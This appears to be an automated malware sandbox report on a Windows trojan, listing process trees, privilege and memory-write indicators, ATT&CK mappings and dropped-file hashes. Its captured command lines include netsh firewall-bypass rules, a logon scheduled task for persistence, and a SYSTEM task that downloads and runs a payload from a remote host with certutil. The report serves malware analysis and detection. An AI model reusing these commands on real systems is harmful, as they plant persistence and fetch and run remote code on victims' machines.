537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	csrss.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.execsrss.exe

pid	process
4120	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4120	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
2984	csrss.exe
2984	csrss.exe
2984	csrss.exe
2984	csrss.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exesvchost.execsrss.exe

description	pid	process
Token: SeDebugPrivilege	4120	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
Token: SeImpersonatePrivilege	4120	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
Token: SeTcbPrivilege	4280	svchost.exe
Token: SeTcbPrivilege	4280	svchost.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe
Token: SeSystemEnvironmentPrivilege	2984	csrss.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe
Token: SeBackupPrivilege	4280	svchost.exe
Token: SeRestorePrivilege	4280	svchost.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

svchost.exe6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.execmd.execmd.execsrss.exe

description	pid	process	target process
PID 4280 wrote to memory of 4436	4280	svchost.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
PID 4280 wrote to memory of 4436	4280	svchost.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
PID 4280 wrote to memory of 4436	4280	svchost.exe	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
PID 4436 wrote to memory of 452	4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe	cmd.exe
PID 4436 wrote to memory of 452	4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe	cmd.exe
PID 452 wrote to memory of 4568	452	cmd.exe	netsh.exe
PID 452 wrote to memory of 4568	452	cmd.exe	netsh.exe
PID 4436 wrote to memory of 4680	4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe	cmd.exe
PID 4436 wrote to memory of 4680	4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe	cmd.exe
PID 4680 wrote to memory of 4164	4680	cmd.exe	netsh.exe
PID 4680 wrote to memory of 4164	4680	cmd.exe	netsh.exe
PID 4436 wrote to memory of 2984	4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe	csrss.exe
PID 4436 wrote to memory of 2984	4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe	csrss.exe
PID 4436 wrote to memory of 2984	4436	6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe	csrss.exe
PID 4280 wrote to memory of 1948	4280	svchost.exe	schtasks.exe
PID 4280 wrote to memory of 1948	4280	svchost.exe	schtasks.exe
PID 4280 wrote to memory of 5072	4280	svchost.exe	schtasks.exe
PID 4280 wrote to memory of 5072	4280	svchost.exe	schtasks.exe
PID 4280 wrote to memory of 1396	4280	svchost.exe	patch.exe
PID 4280 wrote to memory of 1396	4280	svchost.exe	patch.exe
PID 2984 wrote to memory of 552	2984	csrss.exe	bcdedit.exe
PID 2984 wrote to memory of 552	2984	csrss.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
"C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 368
  2⤵
  - Program crash
  PID:1900
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 388
  2⤵
  - Program crash
  PID:4820
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 408
  2⤵
  - Program crash
  PID:2704
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 408
  2⤵
  - Program crash
  PID:2656
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 692
  2⤵
  - Program crash
  PID:4520
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 720
  2⤵
  - Program crash
  PID:3064
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 720
  2⤵
  - Program crash
  PID:1272
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 752
  2⤵
  - Program crash
  PID:3568
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 748
  2⤵
  - Program crash
  PID:3508
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 840
  2⤵
  - Program crash
  PID:3500
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 852
  2⤵
  - Program crash
  PID:5112
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 692
  2⤵
  - Program crash
  PID:3452
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 724
  2⤵
  - Program crash
  PID:3748
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 724
  2⤵
  - Program crash
  PID:4232
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 872
  2⤵
  - Program crash
  PID:2268
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 800
  2⤵
  - Program crash
  PID:5032
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 764
  2⤵
  - Program crash
  PID:2376
- C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe
  "C:\Users\Admin\AppData\Local\Temp\6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195.exe"
  2⤵
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 332
    3⤵
    - Program crash
    PID:2832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 332
    3⤵
    - Program crash
    PID:2172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 392
    3⤵
    - Program crash
    PID:1480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 644
    3⤵
    - Program crash
    PID:4988
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 644
    3⤵
    - Program crash
    PID:3420
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 700
    3⤵
    - Program crash
    PID:4772
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 700
    3⤵
    - Program crash
    PID:3008
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 644
    3⤵
    - Program crash
    PID:1512
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 736
    3⤵
    - Program crash
    PID:1548
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
      4⤵
      PID:4164
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe ""
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2984
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 368
      4⤵
      Program crash
      PID:4828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 372
      4⤵
      Program crash
      PID:2124
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 372
      4⤵
      Program crash
      PID:3964
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 552
      4⤵
      Program crash
      PID:1552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 556
      4⤵
      Program crash
      PID:3336
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1948
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:5072
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 844
      4⤵
      Program crash
      PID:3056
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 844
      4⤵
      Program crash
      PID:4364
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 844
      4⤵
      Program crash
      PID:3456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 844
      4⤵
      Program crash
      PID:3508
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 908
      4⤵
      Program crash
      PID:3500
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 932
      4⤵
      Program crash
      PID:4092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 984
      4⤵
      Program crash
      PID:3452
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      Executes dropped EXE
      PID:1396
  - - C:\Windows\system32\bcdedit.exe
      C:\Windows\Sysnative\bcdedit.exe /v
      4⤵
      Modifies boot configuration data using bcdedit
      PID:552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 924
      4⤵
      Program crash
      PID:4724
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1052
      4⤵
      Program crash
      PID:3720
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1068
      4⤵
      Program crash
      PID:4672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 984
      4⤵
      Program crash
      PID:4752
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1540
      4⤵
      Program crash
      PID:3228
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1808
      4⤵
      Program crash
      PID:848
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1676
      4⤵
      Program crash
      PID:2172
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1552
      4⤵
      Program crash
      PID:2092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1644
      4⤵
      Program crash
      PID:4904
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1640
      4⤵
      Program crash
      PID:1868
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1944
      4⤵
      Program crash
      PID:2752
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1572
      4⤵
      Program crash
      PID:1484
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1560
      4⤵
      Program crash
      PID:5108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1908
      4⤵
      Program crash
      PID:1548
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1956
      4⤵
      Program crash
      PID:1828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1892
      4⤵
      Program crash
      PID:4568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1800
      4⤵
      Program crash
      PID:3152
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1708
      4⤵
      Program crash
      PID:4572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1712
      4⤵
      Program crash
      PID:4000
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1748
      4⤵
      Program crash
      PID:5024
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1064
      4⤵
      Program crash
      PID:2892
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1860
      4⤵
      Program crash
      PID:1552
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 1704
      4⤵
      Program crash
      PID:2912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4120 -ip 4120
1⤵
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4120 -ip 4120
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4120 -ip 4120
1⤵
PID:3336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4120 -ip 4120
1⤵
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4120 -ip 4120
1⤵
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4120 -ip 4120
1⤵
PID:2584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4120 -ip 4120
1⤵
PID:1804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4120 -ip 4120
1⤵
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4120 -ip 4120
1⤵
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4120 -ip 4120
1⤵
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4120 -ip 4120
1⤵
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4120 -ip 4120
1⤵
PID:2784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4120 -ip 4120
1⤵
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4120 -ip 4120
1⤵
PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4120 -ip 4120
1⤵
PID:4404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4120 -ip 4120
1⤵
PID:916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4120 -ip 4120
1⤵
PID:3584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4436 -ip 4436
1⤵
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4436 -ip 4436
1⤵
PID:4376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4436 -ip 4436
1⤵
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4436 -ip 4436
1⤵
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4436 -ip 4436
1⤵
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4436 -ip 4436
1⤵
PID:2036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4436 -ip 4436
1⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4436 -ip 4436
1⤵
PID:744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4436 -ip 4436
1⤵
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2984 -ip 2984
1⤵
PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2984 -ip 2984
1⤵
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2984 -ip 2984
1⤵
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2984 -ip 2984
1⤵
PID:4652

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2984 -ip 2984
1⤵
PID:1472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2984 -ip 2984
1⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2984 -ip 2984
1⤵
PID:4356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2984 -ip 2984
1⤵
PID:3884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2984 -ip 2984
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2984 -ip 2984
1⤵
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2984 -ip 2984
1⤵
PID:3348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2984 -ip 2984
1⤵
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2984 -ip 2984
1⤵
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2984 -ip 2984
1⤵
PID:1284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2984 -ip 2984
1⤵
PID:2412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2984 -ip 2984
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2984 -ip 2984
1⤵
PID:3144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2984 -ip 2984
1⤵
PID:3828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2984 -ip 2984
1⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2984 -ip 2984
1⤵
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2984 -ip 2984
1⤵
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2984 -ip 2984
1⤵
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2984 -ip 2984
1⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2984 -ip 2984
1⤵
PID:1748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2984 -ip 2984
1⤵
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2984 -ip 2984
1⤵
PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2984 -ip 2984
1⤵
PID:1172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2984 -ip 2984
1⤵
PID:1968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2984 -ip 2984
1⤵
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2984 -ip 2984
1⤵
PID:2324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2984 -ip 2984
1⤵
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2984 -ip 2984
1⤵
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2984 -ip 2984
1⤵
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2984 -ip 2984
1⤵
PID:1292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2984 -ip 2984
1⤵
PID:5116

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe

Filesize
3.9MB

MD5
845ea5e600e1106dad9d929650cda38d

SHA1
790a0fdb2fba67ea44823ecf8ba2eb45203fb781

SHA256
6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195

SHA512
8d60a50a1be2caf13602d26c27610848dc0110824b4ba354e7fdd25d01ab76dee3df8882393a384a92bc6adf80be733586040eca2781eaf01ec1b897a450a778

Download Submit
C:\Windows\rss\csrss.exe

Filesize
3.9MB

MD5
845ea5e600e1106dad9d929650cda38d

SHA1
790a0fdb2fba67ea44823ecf8ba2eb45203fb781

SHA256
6daa588bfecc4432cb6e1aaa2f682cee9fc40ce1a5a931300f3110c4f738c195

SHA512
8d60a50a1be2caf13602d26c27610848dc0110824b4ba354e7fdd25d01ab76dee3df8882393a384a92bc6adf80be733586040eca2781eaf01ec1b897a450a778

Download Submit
memory/452-136-0x0000000000000000-mapping.dmp

Download
memory/552-149-0x0000000000000000-mapping.dmp

Download
memory/1396-147-0x0000000000000000-mapping.dmp

Download
memory/1948-145-0x0000000000000000-mapping.dmp

Download
memory/2984-140-0x0000000000000000-mapping.dmp

Download
memory/2984-143-0x0000000003000000-0x00000000033A7000-memory.dmp

Filesize
3.7MB

Download
memory/2984-144-0x0000000000400000-0x0000000000D2D000-memory.dmp

Filesize
9.2MB

Download
memory/4120-130-0x0000000002C18000-0x0000000002FBF000-memory.dmp

Filesize
3.7MB

Download
